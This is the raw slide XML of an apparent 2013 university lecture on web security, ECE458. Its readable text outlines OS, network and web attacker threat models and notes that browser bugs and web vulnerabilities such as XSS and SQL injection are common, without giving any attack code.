                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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67" name="Line 35"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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68" name="Line 36"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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69" name="Line 37"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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70" name="Line 38"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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71" name="Line 39"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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72" name="Line 40"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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73" name="Line 41"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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74" name="Line 42"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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75" name="Line 43"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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76" name="Line 44"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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77" name="Line 45"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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78" name="Line 46"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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79" name="Line 47"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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80" name="Line 48"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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81" name="Line 49"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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82" name="Line 50"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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83" name="Line 51"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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84" name="Line 52"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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85" name="Line 53"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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86" name="Line 54"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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87" name="Line 55"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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  <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1068088" name="Line 56"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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40458C"/>
                    </a:solidFill>
                    <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1068089" name="Rectangle 57" descr="60%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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1068090" name="Line 58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0458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 59"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"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68092" name="Line 60"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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40458C"/>
                  </a:solidFill>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1068093" name="Line 61"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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40458C"/>
                  </a:solidFill>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1068094" name="Arc 62"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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mtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128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8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ＭＳ Ｐゴシック" pitchFamily="-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ＭＳ Ｐゴシック" pitchFamily="-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ＭＳ Ｐゴシック" pitchFamily="-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ＭＳ Ｐゴシック" pitchFamily="-8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3200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-8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2.wmf"/><Relationship Id="rId3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Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp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429000"/>
            <a:ext cx="7467600" cy="1981200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Slides from </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>John Mitchell and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vitaly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Shmatikov</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Modified by Vijay Ganesh)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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28600" y="147638"/>
            <a:ext cx="457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ECE458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6477000" y="147638"/>
            <a:ext cx="2286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Winter 2013</a:t>
            </a:r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895600" y="1976438"/>
            <a:ext cx="3276600" cy="39100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2895600" y="2590800"/>
            <a:ext cx="533400" cy="3295650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF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4191000" y="2514600"/>
            <a:ext cx="1981200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300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15365" name="Picture 4" descr="http://indarktrees.com/pics/villian%2520copy.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="14191" t="2339" r="11314" b="20322"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162800" y="1905000"/>
            <a:ext cx="1703388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8" descr="Alice _8885 by Disney-Grandpa."/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect l="7903" t="10526" r="9120" b="7895"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3886200"/>
            <a:ext cx="1600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TextBox 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="4286250"/>
            <a:ext cx="22764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/>
              <a:t>OS  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker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May control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>malicious files and applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15368" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3486150"/>
            <a:ext cx="71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15369" name="Right Arrow 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="43434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99FF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0" name="Right Arrow 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2057400" y="52578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99FF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1" name="Right Arrow 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324600" y="23622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3300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2" name="Right Arrow 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6324600" y="32766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3300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" name="Title 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="228600"/>
            <a:ext cx="7772400" cy="91440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Operating system security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15374" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="2514600"/>
            <a:ext cx="1066800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF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5" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5638800" y="2514600"/>
            <a:ext cx="533400" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300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15376" name="Picture 5" descr="http://stats.macewan.ca/learn/students/tutorial/glossary/images/OPER-SYS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3200" y="2395538"/>
            <a:ext cx="35147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28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5170487" y="1981200"/>
            <a:ext cx="1001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System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Title 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="304800"/>
            <a:ext cx="7772400" cy="9144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Operating system </a:t>
            </a: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64959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895600" y="1976438"/>
            <a:ext cx="3276600" cy="391001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895600" y="3981450"/>
            <a:ext cx="533400" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF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5638800" y="1976438"/>
            <a:ext cx="533400" cy="2157412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300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13317" name="Picture 4" descr="http://indarktrees.com/pics/villian%2520copy.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="14191" t="2339" r="11314" b="20322"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162800" y="1905000"/>
            <a:ext cx="1703388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8" descr="Alice _8885 by Disney-Grandpa."/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect l="7903" t="10526" r="9120" b="7895"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3886200"/>
            <a:ext cx="1600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TextBox 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6927850" y="4286250"/>
            <a:ext cx="213995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Network Attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Intercepts and controls network communication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13320" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="6267450"/>
            <a:ext cx="71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13321" name="Right Arrow 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="43434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99FF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2" name="Right Arrow 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2057400" y="52578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99FF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3" name="Right Arrow 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324600" y="23622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3300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4" name="Right Arrow 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6324600" y="32766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3300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13325" name="Picture 11" descr="CompaqAlphaServerES4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2255838"/>
            <a:ext cx="1155700" cy="14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6" name="TextBox 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4954588" y="4743450"/>
            <a:ext cx="10017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System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13327" name="Straight Connector 33"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="4432300" y="2967038"/>
            <a:ext cx="488950" cy="30321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28" name="Straight Connector 35"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4242594" y="3899694"/>
            <a:ext cx="1028700" cy="100171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Cloud Callout 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="2778125"/>
            <a:ext cx="1155700" cy="1276350"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -200975"/>
              <a:gd name="adj2" fmla="val 175085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pic>
        <p:nvPicPr>
          <p:cNvPr id="13330" name="Picture 18" descr="toshiba_satellite_a105_s4284_lapto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0" y="4252913"/>
            <a:ext cx="1436688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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="304800"/>
            <a:ext cx="7772400" cy="9144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Network security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895600" y="1976438"/>
            <a:ext cx="3276600" cy="391001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2895600" y="3981450"/>
            <a:ext cx="533400" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF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5638800" y="1981200"/>
            <a:ext cx="533400" cy="2000250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300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14341" name="Picture 4" descr="http://indarktrees.com/pics/villian%2520copy.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="14191" t="2339" r="11314" b="20322"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162800" y="1905000"/>
            <a:ext cx="1703388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8" descr="Alice _8885 by Disney-Grandpa."/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect l="7903" t="10526" r="9120" b="7895"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3886200"/>
            <a:ext cx="1600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3" name="TextBox 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="4286250"/>
            <a:ext cx="227647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Web Attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Sets up malicious site visited by victim; no control of network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14344" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="6267450"/>
            <a:ext cx="71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14345" name="Right Arrow 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="43434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99FF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6" name="Right Arrow 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2057400" y="52578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99FF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7" name="Right Arrow 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324600" y="23622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3300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8" name="Right Arrow 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6324600" y="3276600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3300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14349" name="Picture 11" descr="CompaqAlphaServerES4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2228850"/>
            <a:ext cx="1155700" cy="14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0" name="TextBox 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3184525" y="2619375"/>
            <a:ext cx="1001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System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Cloud Callout 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648200" y="3981450"/>
            <a:ext cx="1155700" cy="1276350"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -186846"/>
              <a:gd name="adj2" fmla="val 43949"/>
            </a:avLst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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14352" name="Straight Connector 33"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="30" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4919662" y="3748088"/>
            <a:ext cx="492125" cy="1206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3" name="Straight Connector 35"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4256088" y="4743450"/>
            <a:ext cx="457200" cy="1714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14354" name="Picture 18" descr="toshiba_satellite_a105_s4284_lapto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0" y="4252913"/>
            <a:ext cx="1436688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itle 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="304800"/>
            <a:ext cx="7772400" cy="9144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Web security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Threat Models</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1451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953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Control attacker.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can obtain SSL/TLS certificate for attacker.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User visits attacker.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Or: runs attacker’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Passive: Wireless eavesdropper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Active: Evil router, DNS poisoning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malware attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker escapes browser isolation mechanisms and run separately under control of OS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1451012" name="Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1600200"/>
            <a:ext cx="0" cy="48006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lg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attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1432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Browsers (like any software) contain exploitable bugs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Often enable remote code execution by web sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Google study:     [the ghost in the browser 2007]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Found Trojans on 300,000 web pages (URLs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Found adware on 18,000 web pages (URLs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Even if browsers were bug-free, still lots of vulnerabilities on the web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>All</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  of the vulnerabilities on previous graph: XSS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
